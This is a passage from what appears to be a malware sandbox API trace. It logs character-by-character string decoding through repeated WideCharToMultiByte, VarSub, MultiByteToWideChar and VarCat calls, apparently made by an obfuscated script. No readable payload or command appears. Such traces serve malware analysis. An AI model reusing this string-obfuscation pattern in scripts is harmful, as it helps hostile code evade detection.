cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.075] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.075] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0084.076] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.076] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.076] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.077] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.077] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.077] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.078] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.078] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.079] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.079] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.079] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.080] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.080] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.080] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.081] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.081] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.081] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.082] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.082] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.082] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.083] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.083] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.083] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.084] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e", lpUsedDefaultChar=0x0) returned 1 [0084.085] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.085] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.085] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.086] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.086] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.086] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.087] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.087] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83", lpUsedDefaultChar=0x0) returned 1 [0084.088] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0084.088] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o", lpUsedDefaultChar=0x0) returned 1 [0084.088] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.088] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.089] VarSub (in: pvarLeft=0x28f504, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.089] VarCat (in: pvarLeft=0x28f5fc, pvarRight=0x28f65c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.090] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.090] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.091] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.091] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.091] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.092] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.092] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.092] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.093] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.093] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.094] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.094] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J", lpUsedDefaultChar=0x0) returned 1 [0084.094] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0084.095] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.095] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.096] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.096] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.096] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.097] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.097] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.097] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.098] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.098] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.098] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.099] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.099] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.100] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.100] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.101] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.101] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o", lpUsedDefaultChar=0x0) returned 1 [0084.101] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.102] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w", lpUsedDefaultChar=0x0) returned 1 [0084.102] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="j", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="j") returned 1 [0084.103] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 